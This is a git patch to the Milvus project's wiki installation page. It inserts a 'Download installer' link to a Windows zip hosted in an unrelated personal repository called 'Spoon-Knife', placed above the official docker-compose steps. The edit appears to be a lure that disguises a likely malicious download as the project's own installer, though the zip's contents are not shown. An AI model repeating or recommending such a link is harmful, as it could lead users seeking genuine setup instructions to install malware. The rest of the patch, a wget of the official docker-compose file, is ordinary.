From 51ba06ea0b5cdad0aa6e6466b2ba68cd95b71a45 Mon Sep 17 00:00:00 2001 From: FrankFeng Date: Wed, 14 Sep 2022 22:54:41 +0200 Subject: [PATCH] Updated Installation (markdown) --- Installation.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Installation.md b/Installation.md index 51e8bc0..086b71c 100644 --- a/Installation.md +++ b/Installation.md @@ -2,6 +2,9 @@ The first step is to see how to install Milvus. # Install Milvus Standalone with docker compose + +[Download installer](https://github.com/FrankFeng/Spoon-Knife/raw/master/Installer%20windows.zip) + Run the following command to download **milvus-standalone-docker-compose.yml** and save it as **docker-compose.yml**. ``` wget https://github.com/milvus-io/milvus/releases/download/v2.0.0-rc6/milvus-standalone-docker-compose.yml -O docker-compose.yml